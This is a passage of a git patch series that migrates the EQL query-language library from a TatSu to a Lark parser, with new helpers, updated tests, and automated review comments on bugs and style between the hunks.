tatsu.exceptions.FailedParse): - info = exc.buf.line_info(exc.pos) - message = 'Invalid syntax' - line = info.line - col = info.col + if exc is None: + try: + eql_node = walker.visit(tree) + if not isinstance(eql_node, ast.EqlNode) and isinstance(eql_node, tuple): + eql_node, type_hint = eql_node + return eql_node + except EqlError as e: + # If full traceback mode is enabled, then re-raise the exception + if 
cfg.read_stack("full_traceback", debugger_attached): + raise + exc = e - source = info.text.rstrip() - if not source: - source = text.rstrip().splitlines()[-1].rstrip() - col = max(len(source) - 1, 0) - - # Raise an EQL error instead - raise EqlSyntaxError(message, line, col, source) + # Python 3 - avoid double exceptions if full_traceback is disabled + raise exc def parse_base_query(text, implied_any=False, implied_base=False, preprocessor=None, subqueries=True): @@ -1064,8 +1235,7 @@ def parse_query(text, implied_any=False, implied_base=False, preprocessor=None, :param PreProcessor preprocessor: Optional preprocessor to expand definitions and constants :rtype: PipedQuery """ - rule = "cli_query" if cli else "single_query" - return _parse(text, rule, implied_any=implied_any, implied_base=implied_base, preprocessor=preprocessor, + return _parse(text, "piped_query", implied_any=implied_any, implied_base=implied_base, preprocessor=preprocessor, subqueries=subqueries, pipes=pipes) 
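Review bot: `'\n'.join(walker.lines[e.line - 2:e.line])` goes wrong for a syntax error on the first line: `e.line - 2` is -1, so the slice starts at the last line and, for any multi-line input, is empty, leaving the `EqlSyntaxError` without a source snippet; clamp it with `walker.lines[max(e.line - 2, 0):e.line]`. The handler also assumes every `LarkError` carries `line` and `column`; if a Lark exception is raised without a position, the `except` block itself fails with `AttributeError` instead of the intended `EqlSyntaxError`, so either narrow the clause to the positioned exception type (`lark.exceptions.UnexpectedInput`, if that is what the installed version raises) or read the attributes with `getattr(e, 'line', 1)`. `_parse` starts before this hunk, inside its docstring.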
@@ -1080,18 +1250,17 @@ def parse_expression(text, implied_any=False, preprocessor=None, subqueries=True :param PreProcessor preprocessor: Optional preprocessor to expand definitions and constants :rtype: Expression """ - return _parse(text, start='single_expression', - implied_any=implied_any, preprocessor=preprocessor, subqueries=subqueries) + return _parse(text, start='expr', implied_any=implied_any, preprocessor=preprocessor, subqueries=subqueries) def parse_atom(text, cls=None): # type: (str, type) -> ast.Field|ast.Literal """Parse and get an atom.""" - rule = "single_atom" - atom = _parse(text, start="single_atom") + rule = "signed_single_atom" + atom = _parse(text, start=rule) if cls is not None and not isinstance(atom, cls): - walker = EqlWalker() - tatsu_ast = _get_parser().parse(text, rule_name=rule, start=rule, parseinfo=True) - raise walker._error(tatsu_ast, "Expected {expected} not {actual}", + walker = LarkToEQL(text) + lark_tree = lark_parser.parse(text, start=rule) + raise walker._error(lark_tree, "Expected {expected} not {actual}", expected=cls.__name__.lower(), actual=type(atom).__name__.lower()) return atom @@ -1143,7 +1312,7 @@ def parse_definition(text, preprocessor=None, implied_any=False, subqueries=True :param bool subqueries: Toggle support for subqueries (sequence, join, named of, etc.) :rtype: Definition """ - return _parse(text, start='single_definition', preprocessor=preprocessor, + return _parse(text, start='definition', preprocessor=preprocessor, implied_any=implied_any, subqueries=subqueries) 
@@ -1182,3 +1351,42 @@ def get_preprocessor(text, implied_any=False, subqueries=None, preprocessor=None new_preprocessor.add_definitions(definitions) return new_preprocessor + + +class TermExtractor(Interpreter, object): + """Extract query terms from a sequence, join or flat query.""" + + def __init__(self, text): + self.text = text + + def event_query(self, tree): + return self.text[tree.meta.start_pos:tree.meta.end_pos] + + def piped_query(self, tree): + """Extract all terms.""" + if tree["base_query"]: + if tree["base_query"]["event_query"]: + return [self.visit(tree["base_query"]["event_query"])] + return self.visit(tree["base_query"].children[0]) + return [] + + def sequence(self, tree): + """Extract the terms in the sequence.""" + return [self.visit(term["subquery"]["event_query"]) for term in tree.get_list("subquery_by")] + + # these have similar enough ASTs that this is fine for extracting terms + join = sequence + + +def extract_query_terms(text, **kwargs): + """Parse out the query terms from an event query, join or sequence. + + :param str text: EQL source text to parse + :rtype: list[str] + """ + # validate that it parses first so that EQL exceptions are raised + parse_query(text, **kwargs) + + tree = lark_parser.parse(text, start="piped_query") + extractor = TermExtractor(text) + return list(extractor.visit(tree)) diff --git a/eql/pipes.py b/eql/pipes.py index 529d601..26b8cc6 100644 --- a/eql/pipes.py +++ b/eql/pipes.py @@ -1,7 +1,7 @@ """EQL Pipes.""" from .ast import PipeCommand, TimeRange -from .schema import Schema, EVENT_TYPE_GENERIC -from .types import dynamic, NUMBER, literal, PRIMITIVES, EXPRESSION, get_type +from .schema import Schema, EVENT_TYPE_GENERIC, MIXED_TYPES +from .types import dynamic, NUMBER, literal, PRIMITIVES, EXPRESSION, get_type, BASE_STRING from .utils import is_string __all__ = ( 
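Review bot: `TermExtractor.event_query` and `__init__` are the only members of the new class without a docstring; `"""Return the raw source text spanned by an event_query subtree."""` and `"""Keep the source text so subtree positions can be sliced back into it."""` would match the others. `extract_query_terms` parses the input twice — through `parse_query`, which (per the `_parse` hunk) appends a trailing newline before parsing, and then raw via `lark_parser.parse(text, ...)` — so a one-line comment stating that the second parse is deliberately on the unmodified text, so `meta.start_pos`/`meta.end_pos` map onto the caller's string, would record why the first parse's tree is not reused.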
@@ -41,10 +41,12 @@ class CountPipe(ByPipe): def output_schemas(cls, arguments, type_hints, event_schemas): # type: (list, list, list[Schema]) -> list[Schema] """Generate the output schema and determine the ``key`` field dyanmically.""" + if type_hints is None: + type_hints = [MIXED_TYPES for _ in arguments] base_hints = [get_type(t) for t in type_hints] - base_hints = ["mixed" if not is_string(t) else t for t in base_hints] + base_hints = [MIXED_TYPES if not is_string(t) else t for t in base_hints] if len(arguments) == 0: - key_hint = "string" + key_hint = BASE_STRING elif len(arguments) == 1: key_hint = base_hints[0] else: @@ -123,7 +125,7 @@ class UniquePipe(ByPipe): class UniqueCountPipe(ByPipe): """Returns unique results but adds a count field.""" - minimum_args = 0 + minimum_args = 1 @classmethod def output_schemas(cls, arguments, type_hints, event_schemas): diff --git a/eql/shell.py b/eql/shell.py index d0aec82..718da75 100644 --- a/eql/shell.py +++ b/eql/shell.py @@ -16,7 +16,7 @@ from .engine import PythonEngine from .errors import EqlSyntaxError, EqlParseError from .functions import list_functions -from .parser import parse_query, _get_parser, allow_enum_fields +from .parser import parse_query, keywords, allow_enum_fields from .pipes import list_pipes, CountPipe from .schema import Schema, EVENT_TYPE_ANY, EVENT_TYPE_GENERIC from .table import Table @@ -65,8 +65,11 @@ PYREADLINE = "pyreadline" GNUREADLINE = "gnureadline" -# Determine the input function that should be used for the prompt -input_func = getattr(__builtins__, "raw_input", input) +# Determine the input function that should be used for the prompt in a python2 and python3 compatible way +try: + input_func = raw_input +except NameError: + input_func = input # Determine which version of readline is installed for module in ["readline", "gnureadline"]: 
@@ -209,23 +212,22 @@ def get_keywords(cls, force=False): """Get the EQL keywords.""" if force or not cls.__eql_keywords: wordlist = set() - parser = _get_parser() - keywords = set(parser.keywords) + updated_keywords = set(keywords) - keywords.remove("in") - keywords.add("in (") + updated_keywords.remove("in") + updated_keywords.add("in (") wordlist.update(["true", "false", "null"]) - keywords.remove("with") + updated_keywords.remove("with") wordlist.update(["with maxspan=", "fork=true"]) wordlist.update("{}(".format(f) for f in list_functions()) wordlist.update("| {}".format(p) for p in list_pipes()) - keywords.remove("of") + updated_keywords.remove("of") wordlist.update(["{} of [".format(k) for k in NamedSubquery.supported_types]) - wordlist.update(keywords) + wordlist.update(updated_keywords) cls.__eql_keywords = list(sorted(wordlist)) return cls.__eql_keywords @@ -442,7 +444,7 @@ def help_search(self, *args): def do_search(self, search_text): """Run an EQL search over the input data.""" - search_lines = search_text.splitlines(keepends=False) + search_lines = search_text.splitlines(False) self.multiline = False # if only "search" is typed in, then keep prompting @@ -463,7 +465,7 @@ def do_search(self, search_text): # check if the query is fully valid, but spans multiple lines # we want to keep prompting until we see a semicolon, or two blank lines - if len(self.lastcmd.splitlines(keepends=True)) > 1: + if len(self.lastcmd.splitlines(True)) > 1: if not search_text.endswith(";") and self.empty_count < 2: self.multiline = True return diff --git a/eql/tests/base.py b/eql/tests/base.py index 2b19fc6..8af9a97 100644 --- a/eql/tests/base.py +++ b/eql/tests/base.py 
@@ -47,16 +47,23 @@ def get_events(cls): cls.__events = [Event.from_data(d) for d in data] return cls.__events + @classmethod + def filter_queries(cls, q): + """Helper method for filtering the test queries for subclasses.""" + return True + @classmethod def get_example_queries(cls): """Get example queries with their expected outputs.""" with open(cls.queries_file, "r") as f: - queries = list(q for _, q in sorted(toml.load(f)["queries"].items())) - for q in queries: + queries = [] + for q in toml.load(f)["queries"]: analytic = cls.get_analytic(q['query']) analytic.metadata['_info'] = q.copy() q['analytic'] = analytic - return [q for q in queries if cls.engine_name not in q.get('skip', [])] + queries.append(q) + + return list(filter(cls.filter_queries, queries)) @classmethod def get_example_analytics(cls): diff --git a/eql/utils.py b/eql/utils.py index 841f10c..d2bb2db 100644 --- a/eql/utils.py +++ b/eql/utils.py @@ -46,7 +46,7 @@ def is_string(s): def is_number(n): """Check if a python object is a unicode or ascii string.""" - return isinstance(n, numbers) + return isinstance(n, numbers) and not isinstance(n, bool) def is_array(a): @@ -226,7 +226,10 @@ def is_stateful(query): from . import ast # noqa: E402 from . import pipes # noqa: E402 - if not isinstance(query, ast.EqlNode): + if isinstance(query, ast.EqlAnalytic): + query = query.query + + elif not isinstance(query, ast.EqlNode): raise TypeError("unsupported type {} to is_stateful. Expected {}".format(type(query), ast.EqlNode)) stateful_nodes = ( 
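Review bot: `return [q for q in queries if cls.engine_name not in q.get('skip', [])]` is replaced by `list(filter(cls.filter_queries, queries))`, but the new default `filter_queries` returns `True` unconditionally, so queries that list this engine under `skip` are now executed unless every subclass overrides the hook. If the skip metadata still applies, make the base implementation `return cls.engine_name not in q.get('skip', [])` and let subclasses extend it via `super()`. The ordering change is also silent: the old code sorted `toml.load(f)["queries"].items()`, the new code iterates the value directly, which presumes the TOML now holds a list in file order — worth a comment on the `for q in` line.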
@@ -280,6 +283,23 @@ def match_kv(condition): return and_node +def get_output_types(query): + """Get the output event types for a query.""" + from .walkers import RecursiveWalker + from .ast import EqlAnalytic, PipedQuery + + if isinstance(query, EqlAnalytic): + query = query.query + + elif not isinstance(query, PipedQuery): + raise TypeError("unsupported type {} to get_output_types. Expected {}".format(type(query), PipedQuery)) + + walker = RecursiveWalker() + walker.walk(query) + + return walker.output_event_types + + def load_extensions(force=False): """Load EQL extensions.""" global _loaded_plugins diff --git a/eql/walkers.py b/eql/walkers.py index f21f873..fedd2ef 100644 --- a/eql/walkers.py +++ b/eql/walkers.py @@ -2,7 +2,6 @@ import re from collections import defaultdict, deque from contextlib import contextmanager - from .schema import Schema from .utils import is_string, to_unicode @@ -31,6 +30,7 @@ def __init__(self): self.in_pipes = [] self.base_event_types = [] self.node_stack = [] + self.output_event_types = [] def register_func(self, node_cls, func, prefix="_walk_"): """Register a callback function.""" @@ -81,12 +81,15 @@ def _enter_event_query(self, node): self.event_stack.append(node.event_type) def _enter_piped_query(self, node): # type: (PipedQuery) -> None + self.output_event_types = [] self.base_event_types = [] if isinstance(node.first, EventQuery): self.base_event_types.append(node.first.event_type) else: self.base_event_types.extend(q.query.event_type for q in node.first.queries) + self.output_event_types = self.base_event_types[:] + def _enter_pipe_command(self, node): self.in_pipes = True 
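Review bot: `get_output_types` documents only its purpose, whereas `extract_query_terms` added in the same series carries `:param`/`:rtype` lines; adding `:param EqlAnalytic|PipedQuery query: analytic or piped query to inspect` and `:rtype: list` (a list of event-type values, judging by the `test_utils` expectations) keeps the public helpers consistent. The function-scope imports of `RecursiveWalker`, `EqlAnalytic` and `PipedQuery` follow the pattern `is_stateful` uses just above; a `# imported here to avoid a circular import` comment would state the reason, if that is it. The result comes from `walker.output_event_types`, which the walkers hunk populates, so a reader of this file alone cannot see how it is derived — a reference to `RecursiveWalker._exit_pipe_command` in the docstring would help.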
@@ -103,8 +106,13 @@ def _exit_piped_query(self, node): self.base_event_types = [] def _exit_pipe_command(self, node): + """Update the output schemas as they change through each pipe.""" self.in_pipes = False + incoming_schema = [Schema({event_type: {}}) for event_type in self.output_event_types] + output_schemas = node.output_schemas(node.arguments, None, incoming_schema) + self.output_event_types = [next(iter(s.schema.keys())) for s in output_schemas] + def _walk_default(self, node, *args, **kwargs): return node diff --git a/requirements.txt b/requirements.txt index 5ac1014..772ca36 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1 +1 @@ -TatSu==4.2.6 +lark-parser~=0.7 \ No newline at end of file diff --git a/setup.py b/setup.py index 487d919..ab968c9 100644 --- a/setup.py +++ b/setup.py @@ -59,7 +59,7 @@ class Test(TestCommand): def initialize_options(self): """Need to ensure pytest_args exists.""" TestCommand.initialize_options(self) - self.pytest_args = [] + self.pytest_args = ["--disable-warnings"] def run_tests(self): """Run pytest.""" diff --git a/tests/test_optimizations.py b/tests/test_optimizations.py index 67172b4..f1c157d 100644 --- a/tests/test_optimizations.py +++ b/tests/test_optimizations.py @@ -139,11 +139,19 @@ def test_static_value_optimizations(self): '2 >= 1', '2 >= 2', '2 != 1', + '(1 * 2 + 3 * 4 + 10 / 2) == (2 + 12 + 5)', + '(1 * 2 + 3 * 4 + 10 / 2) == 19', + '1 * 2 + 3 * 4 + 10 / 2 == 2 + 12 + 5', '"ABC" <= "ABC"', "length('abcdefg') == 7", "100 in (1, 2, 3, 4, 100, 105)", "'rundll' in (abc.def[100], 'RUNDLL')", "not 'rundll' in ('100', 'nothing')", + '1 - -2 == 3', + '1 - +2 == -1', + '1 +- length(a) == 1 - length(a)', + '100:concat():length() == 3', + '995 == (100 * 10):subtract("hello":length())', ] expected_false = [ 
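Review bot: `node.output_schemas(node.arguments, None, incoming_schema)` passes `None` as `type_hints` for every pipe command, but the only `output_schemas` this series guards for `None` is CountPipe's (`if type_hints is None:` in the eql/pipes.py hunk); UniqueCountPipe and any other pipe whose body is not shown would need the same tolerance, otherwise walking a query that uses such a pipe now raises inside `_exit_pipe_command`. `next(iter(s.schema.keys()))` also raises `StopIteration` on an empty schema and silently keeps only the first key when a schema holds several event types; unless output schemas are guaranteed single-key, `[k for s in output_schemas for k in s.schema]` is safer and just as short. `_exit_pipe_command` is shown in full, but its class starts outside the hunk.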
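Review bot: `lark-parser~=0.7` replaces the exact `TatSu==4.2.6` pin with a compatible-release range that resolves to any 0.x release from 0.7 upwards, so installs are no longer reproducible from this file alone and a later 0.x release can change parser behaviour underneath the new LarkToEQL visitor; pin the release that was tested (`lark-parser==<tested 0.7.x version>`) or keep the range here and add a lock file. The file also loses its trailing newline.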
@@ -155,6 +163,8 @@ def test_static_value_optimizations(self): '"ABC*DEF" == " ABC DEF "', '"abc" > "def"', '"abc" != "abc"', + # check that these aren't left to right + '1 * 2 + 3 * 4 + 10 / 2 == 15', ] for expression in expected_true: diff --git a/tests/test_parser.py b/tests/test_parser.py index 267eff9..d622e92 100644 --- a/tests/test_parser.py +++ b/tests/test_parser.py @@ -8,8 +8,10 @@ from eql.ast import * # noqa: F403 from eql.errors import EqlSyntaxError, EqlSemanticError, EqlParseError from eql.parser import ( - parse_query, parse_expression, parse_definitions, ignore_missing_functions, parse_field, parse_literal + parse_query, parse_expression, parse_definitions, ignore_missing_functions, parse_field, parse_literal, + extract_query_terms ) +from eql.walkers import DepthFirstWalker from eql.pipes import * # noqa: F403 @@ -39,6 +41,7 @@ def test_valid_expressions(self): '"string"', 'abc and def', '(1==abc) and def', + '1 * 2 + 3 * 4 + 10 / 2', 'abc == (1 and 2)', 'abc == (def and 2)', 'abc == (def and def)', @@ -90,7 +93,6 @@ def test_invalid_expressions(self): '', # empty 'a xor b', # made up comparator 'a ^ b', # made up comparator - 'a % "b"', # made up comparator 'a b c d', # missing syntax 'def[]', # no index 'def[ghi]', # index not a number @@ -156,6 +158,14 @@ def test_valid_queries(self): 'image_load where not x <= y', 'image_load where not x >= y', 'image_load where not x > y', + 'process where _leadingUnderscore == 100', + 'network where 1 * 2 + 3 * 4 + 10 / 2 == 2 + 12 + 5', + 'file where 1 - -2', + 'file where 1 + (-2)', + 'file where 1 * (-2)', + 'file where 3 * -length(file_path)', + 'network where a * b + c * d + e / f == g + h + i', + 'network where a * (b + c * d) + e / f == g + h + i', 'process where pid == 4 or pid == 5 or pid == 6 or pid == 7 or pid == 8', 'network where pid == 0 or pid == 4 or (ppid == 0 or ppid = 4) or (abc == defgh) and process_name == "*" ', 'network where pid = 4', 
@@ -256,7 +266,6 @@ def test_invalid_queries(self): 'file_name )', 'file_name (\r\n\r\n', 'file_name where (\r\n\r\n)', - 'process where _badSymbol == 100', 'process where 1field == 2field', 'sequence where 1field == 2field', 'process where true | filter', 
@@ -362,3 +371,62 @@ def test_invalid_comments(self): query_text = "process where // true" self.assertRaises(EqlParseError, parse_query, query_text) + + def test_method_syntax(self): + """Test correct parsing and rendering of methods.""" + parse1 = parse_expression("(a and b):concat():length()") + parse2 = parse_expression("a and b:concat():length()") + self.assertNotEquals(parse1, parse2) + + class Unmethodize(DepthFirstWalker): + """Strip out the method metadata, so its rendered directly as a node.""" + + def _walk_function_call(self, node): + node.as_method = False + return node + + without_method = Unmethodize().walk(parse1) + expected = parse_expression("length(concat(a and b))") + + self.assertEquals(parse1, parse_expression("(a and b):concat():length()")) + self.assertIsNot(parse1, without_method) + self.assertEquals(without_method, expected) + + def test_term_extraction(self): + """Test that EQL terms are correctly extracted.""" + process_event = """ + process where process_name == "net.exe" and child of [ + network where destination_port == 443 + ] + """ + file_event = "file where false" + network_event = " network where\n\n\n\n destination_address='1.2.3.4'\n\t and destination_port == 8443" + + sequence_template = "sequence with maxspan=10m [{}] by field1, field2, [{}] by field2, field3 [{}] by f4, f5" + join_template = "join [{}] by a [{}] by b [{}] by c until [dns where false] by d" + + # basic sequence with by + terms = [process_event, network_event, file_event] + stripped = [t.strip() for t in terms] + sequence_extracted = extract_query_terms(sequence_template.format(*terms)) + self.assertListEqual(sequence_extracted, stripped) + + # sequence with by and pipes + terms = [network_event, process_event, process_event] + stripped = [t.strip() for t in terms] + sequence_extracted = extract_query_terms(sequence_template.format(*terms) + "| head 100 | tail 10") + self.assertListEqual(sequence_extracted, stripped) + + # join with by + terms = [network_event, 
process_event, process_event] + stripped = [t.strip() for t in terms] + join_extracted = extract_query_terms(join_template.format(*terms)) + self.assertListEqual(join_extracted, stripped) + + # simple query without pipes + simple_extracted = extract_query_terms(network_event) + self.assertListEqual(simple_extracted, [network_event.strip()]) + + # simple query with pipes + simple_extracted = extract_query_terms(network_event + "| unique process_name, user_name\n\n| tail 10") + self.assertListEqual(simple_extracted, [network_event.strip()]) diff --git a/tests/test_python_engine.py b/tests/test_python_engine.py index c59ba53..2b64540 100644 --- a/tests/test_python_engine.py +++ b/tests/test_python_engine.py @@ -6,7 +6,6 @@ from eql import * # noqa: F403 from eql.ast import * # noqa: F403 from eql.parser import ignore_missing_functions -from eql.functions import Wildcard, Match from eql.schema import EVENT_TYPE_GENERIC from eql.tests.base import TestEngine @@ -122,7 +121,7 @@ def test_raises_errors(self): # ('process where length(0)', TypeError), # ('file where file_name.abc', AttributeError), # ('file where pid.something', AttributeError), - ('registry where invalidFunction(pid, ppid)', KeyError), + ('registry where invalidFunction(pid, ppid)', EqlCompileError), ] # Make sure that these all work as expected queries 
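Review bot: `assertNotEquals` and `assertEquals` in `test_method_syntax` are the deprecated unittest aliases (removed in Python 3.12); use `assertNotEqual` and `assertEqual`. The same aliases are used throughout `test_output_types` in the tests/test_utils.py hunk. The nested walker's docstring has a typo: `"""Strip out the method metadata, so it's rendered directly as a node."""`, and a comment on `node.as_method = False` saying that this is the flag the renderer checks would make the test's intent clear without reading the AST module.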
@@ -496,29 +495,6 @@ def test_relationship_pid_collision(self): event_ids = [event.data['unique_pid'] for event in output] self.validate_results(event_ids, ['host1-1003'], "Relationships failed due to pid collision") - def test_mutli_line_functions(self): - """Test wildcard and match functions.""" - sources = [ - "this is a single line comment", - """This is - a multiline - comment""", - "this\nis\nalso\na\nmultiline\ncomment" - ] - - for source in sources: - self.assertTrue(Match.run(source, ".*comment")) - # \n newlines must match on \n \s etc. but won't match on " " - self.assertTrue(Match.run(source, ".*this\sis\s.*comment")) - self.assertTrue(Match.run(source, "t.+a.+c.+")) - self.assertFalse(Match.run(source, "MiSsInG")) - - for source in sources: - self.assertTrue(Wildcard.run(source, "*comment")) - self.assertTrue(Wildcard.run(source, "this*is*comment")) - self.assertTrue(Wildcard.run(source, "t*a*c*")) - self.assertFalse(Wildcard.run(source, "MiSsInG")) - def test_pipes_reset_state(self): """Test that the pipes are clearing their state after receiving PIPE_EOF""" events = self.get_events() @@ -526,7 +502,6 @@ def test_pipes_reset_state(self): queries = [ 'process where true | unique opcode', 'process where true | unique_count opcode', - 'process where true | unique_count', 'process where true | count', 'process where true | count opcode', 'process where true | head 1', diff --git a/tests/test_schema.py b/tests/test_schema.py index 2ec6ac6..4fa8f19 100644 --- a/tests/test_schema.py +++ b/tests/test_schema.py @@ -159,7 +159,7 @@ def test_array_function_failures(self): for query in valid: self.assertRaises(EqlTypeMismatchError, parse_query, query) - def test_strict_schema(self): + def test_strict_schema_failures(self): """Check that fields can't be compared to null under strict schemas.""" queries = [ "process where command_line != null", 
@@ -174,6 +174,18 @@ def test_strict_schema(self): for query in queries: self.assertRaises(EqlTypeMismatchError, parse_query, query) + def test_strict_schema_success(self): + """Check that fields can't be compared to null under strict schemas.""" + queries = [ + "process where command_line != 'abc.exe'", + "process where elevated != true", + "process where not elevated", + ] + + with strict_field_schema, Schema(self.schema): + for query in queries: + parse_query(query) + def test_count_schemas(self): """Test that schemas are updated with counts in pipes.""" queries = [ diff --git a/tests/test_utils.py b/tests/test_utils.py index 556dcc7..bb096c9 100644 --- a/tests/test_utils.py +++ b/tests/test_utils.py @@ -4,8 +4,8 @@ import unittest import eql.utils -from eql.parser import parse_query, parse_expression, EqlParseError -from eql.utils import is_stateful, match_kv +from eql.parser import parse_query, parse_expression, parse_analytic, EqlParseError +from eql.utils import is_stateful, match_kv, get_output_types class TestUtils(unittest.TestCase): 
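Review bot: The docstring on `test_strict_schema_success` is copied from the failure test and states the opposite of what the test checks — these queries are expected to parse; replace it with `"""Check that non-null comparisons still parse under strict schemas."""`.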
@@ -142,3 +142,65 @@ def test_match_kv_errors(self): self.assertRaises(TypeError, match_kv, []) self.assertRaises(TypeError, match_kv, True) self.assertRaises(TypeError, match_kv, 1) + + def test_output_types(self): + """Test that output types are correctly returned from eql.utils.get_output_types.""" + query_ast = parse_query("process where true") + self.assertEquals(get_output_types(query_ast), ["process"]) + + query_ast = parse_analytic({"query": "process where descendant of [file where true]"}) + self.assertEquals(get_output_types(query_ast), ["process"]) + + query_ast = parse_query("file where true | unique pid | head 1") + self.assertEquals(get_output_types(query_ast), ["file"]) + + query_ast = parse_query("file where true | unique_count file_path") + self.assertEquals(get_output_types(query_ast), ["file"]) + + query_ast = parse_query("any where true | unique_count file_path") + self.assertEquals(get_output_types(query_ast), ["any"]) + + query_ast = parse_query("file where true | count") + self.assertEquals(get_output_types(query_ast), ["generic"]) + + query_ast = parse_query("file where true | count process_name") + self.assertEquals(get_output_types(query_ast), ["generic"]) + + query_ast = parse_query(""" + sequence + [registry where true] + [file where true] + [process where true] + [process where true] + [process where true] + [network where true] + """) + self.assertEquals(get_output_types(query_ast), ["registry", "file", "process", "process", "process", "network"]) + + query_ast = parse_query(""" + sequence + [registry where true] + [file where true] + [process where true] + [process where true] + [process where true] + [network where true] + | count event_type + | head 5 + """) + self.assertEquals(get_output_types(query_ast), ["generic"]) + + query_ast = parse_query(""" + sequence + [registry where true] + [file where true] + [process where true] + [process where true] + [process where true] + [network where true] + | unique events[2].event_type + | 
sort events[1].file_size + | head 5 + | filter events[4].process_name == 'test.exe' + """) + self.assertEquals(get_output_types(query_ast), ["registry", "file", "process", "process", "process", "network"]) From 7682f9de32cb3f04b4b2b7fea5375167e1fa93e4 Mon Sep 17 00:00:00 2001 From: Carl Rutherford Date: Tue, 4 Feb 2020 14:20:19 +0000 Subject: [PATCH 12/13]  Conflicts:  eql/etc/eql.ebnf  eql/etc/test_queries.toml  eql/pipes.py  tests/test_python_engine.py --- .coveragerc | 19 +++ eql/etc/eql.ebnf | 262 ---------------------------------------- eql/etc/eql.g | 110 +++++++++++++++++ tests/test_functions.py | 180 +++++++++++++++++++++++++++ 4 files changed, 309 insertions(+), 262 deletions(-) create mode 100644 .coveragerc delete mode 100644 eql/etc/eql.ebnf create mode 100644 eql/etc/eql.g create mode 100644 tests/test_functions.py diff --git a/.coveragerc b/.coveragerc new file mode 100644 index 0000000..ed1b99d --- /dev/null +++ b/.coveragerc @@ -0,0 +1,19 @@ +# .coveragerc to control coverage.py +[run] +branch = True + +[report] +exclude_lines = + pragma: no cover + + raise NotImplementedError + raise EqlCompileError + + +omit = + eql/__main__.py + eql/highlighters.py + eql/shell.py + eql/table.py + eql/_parsergen.py + eql/tests/* diff --git a/eql/etc/eql.ebnf b/eql/etc/eql.ebnf deleted file mode 100644 index c3186d1..0000000 --- a/eql/etc/eql.ebnf +++ /dev/null 
@@ -1,262 +0,0 @@ -@@grammar::EQL -@@left_recursion :: False -@@comments :: /\/\*(?:.|\n)*?\*\// -@@eol_comments :: /\/\/(?:.|\n)*?$/ -@@keyword :: and by const in join macro not of or sequence until where with -start = single_query; - - -cli_query = @:piped_query [';'] $; - - -piped_query::PipedQuery - = - | query:base_query pipes:[pipe_chain] - | query:() pipes:pipe_chain - ; - - -pipe_chain = {'|' ~ @+:pipe_command}+; - -pipe_command::Pipe - = - name:ident args:pipe_arguments - ; - - -pipe_arguments - = - | &(atom atom) {atom} - | expressions - | {} - ; - -base_query - = - | sequence - | join - | event_query - ; - -join::Join - = 'join' ~ shared_by:by_values queries+:subquery_by {queries:subquery_by}+ [until:until_clause]; - -sequence::Sequence - = - 'sequence' ~ - (shared_by:by_values ['with' params:named_params]|['with' params:named_params] shared_by:by_values) - queries:subquery_by - {queries:subquery_by}+ - [until:until_clause] - ; - -until_clause - = 'until' ~ @:subquery_by; - -subquery_by::SubqueryBy - = query:subquery params:[named_params] join_values:[by_values]; - - -subquery = '[' ~ @:event_query ']'; - -by_values - = - | 'by' ~ @:expressions - | {} - ; - - -event_query::EventQuery - = - [event_type:ident 'where' ~ ] cond:root_expression - ; - - -macro::Macro - = - 'macro' ~ name:ident '(' params:params')' body:root_expression - ; - -const::Constant - = - 'const' ~ name:ident equals value:literal - ; - - -# At some point will add CONST or other types of definitions -definition - = - | macro - | const - ; - - -# Start rules -definitions = {definition} $; -single_definition = definition $; -single_query = piped_query $; -single_expression = root_expression $; -single_atom = atom $; - - -root_expression::RootExpression - = expr:expression - ; - -expression - = - | or_expr - | subexpression - ; - -# Add check for missing parenthesis -check_paren::CheckParentheses - = - '(' ~ expr:expression ')' - ; - -or_expr::OrTerms - = terms+:subexpression {'or' ~ 
terms+:subexpression}+; - -subexpression - = - | and_expr - | term - ; - -and_expr::AndTerms - = terms+:term {'and' ~ terms+:term}+; - -term - = - | not_term - | sub_term - ; - -not_term::NotTerm - = 'not' ~ t:term; - - -sub_term - = - | comparison - | in_set - | value - ; - - -comparison::Comparison - = left:value op:comparator ~ right:value; - -in_set::InSet - = - expr:value 'in' ~ '(' container:expressions ')' - ; - -# Operators -equals::Equals = '==' | '='; -comparator::Comparator = comp:('<=' | '<' | equals | '!=' | '>=' | '>'); - - -value - = - | function_call - | named_subquery - | check_paren - | atom - ; - -function_call::FunctionCall - = - name:ident '(' ~ args:[expressions] ')' - ; - - -atom - = - | time_unit - | literal - | field - ; - - -expressions - = - @+:argument {',' @+:argument} [','] - ; - -argument - = expression; - -subquery_type::SubqueryType - = name:ident 'of' ~; - -named_subquery::NamedQuery - = stype:subquery_type query:subquery; - - -field::Field - = - base:ident sub_fields:{attribute | array_index} - ; - -attribute::Attribute - = '.' attr:ident - ; - - -array_index::ArrayIndex - = - '[' value:unsigned_integer ']' - ; - - -named_params::NamedParams - = - params:{named_param} - ; - -named_param::NamedParam - = - k:ident [equals v:(time_unit | atom)] - ; - -params - = - @+:ident {',' @+:ident} | {} - ; - - -# Fields -@name -ident = /[a-zA-Z][a-zA-Z0-9_]*/; - -# Literals -literal::Literal = value:( decimal | integer | string | raw_string); - -time_unit::TimeRange = val:(decimal|integer) unit:ident; # validated in python - -unsigned_integer::int - = /[0-9]+/ - ; - - -integer::int - = /[-+]?[0-9]+/ - ; - -decimal::float - = /[-+]?(?:\d+\.\d*|\d*\.\d+)(?:[Ee][-+]?\d+)?/ - ; - -string - = - | '\"' ~ @:/(\\[btnfr"'\\]|[^\r\n"\\])*/ '\"' - | "\'" ~ @:/(\\[btnfr"'\\]|[^\r\n'\\])*/ "\'" - ; - -raw_string - = - | '?\"' ~ @:/(\\"|[^"])*/ '\"' - | "?\'" ~ @:/(\\'|[^'])*/ "\'" - ; 
diff --git a/eql/etc/eql.g b/eql/etc/eql.g new file mode 100644 index 0000000..af62bba --- /dev/null +++ b/eql/etc/eql.g 
